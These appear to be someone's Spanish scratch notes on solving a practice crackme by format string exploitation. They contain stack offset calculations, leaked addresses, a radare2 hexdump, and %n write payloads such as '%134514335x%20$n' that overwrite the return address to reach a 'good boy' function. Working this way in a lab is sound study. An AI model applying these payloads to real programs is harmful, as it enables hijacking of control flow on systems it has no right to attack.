

el 14$ apunta al 20$
el 19$ es el ret addr

%14$x - 4   = addr del ret addr
%19$p - 242 = addr de good boy

%14$p %19$p   -> direc del ret +4 y ret addr


%<addr del ret addr>x%14$n          -> escribo addr del ret addr en 20$


%134514335x%20$n           -> escribo good boy en el ret addr

134514335



0xff9500cc = addr del ret addr
0x804869f  = addr de good boy


********************************************************

%14$p

> addr del ret addr = %14$p - 4

%2100000000x%2100000000x%...x%14$n

%134514335x%20$n


89263356


... = addr del ret addr % 2100000000x




0x804a100 0x64 (nil) (nil) (nil) (nil) (nil) (nil) 0x8048870 (nil) 0x1 0xffd20934 0xffd21fdc 0xffd0e530 0xffd0e534 (nil) (nil) 0xffd207b8 0x8048791 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) Give me some format strings(3)


hit breakpoint at: 8048615
[0x08048615]> px 200 @ esp
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xffd0e4e0  00a1 0408 00a1 0408 6400 0000 0000 0000  ........d.......
0xffd0e4f0  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e500  0000 0000 7088 0408 0000 0000 0200 0000  ....p...........
0xffd0e510  3409 d2ff dc1f d2ff 30e5 d0ff 34e5 d0ff  4.......0...4...
0xffd0e520  0000 0000 0000 0000 b807 d2ff 9187 0408  ................
0xffd0e530  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e540  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e550  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e560  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e570  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e580  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e590  0000 0000 0000 0000 0000 0000 0000 0000  ................
0xffd0e5a0  0000 0000 0000 0000                      ........
[0x08048615]> 
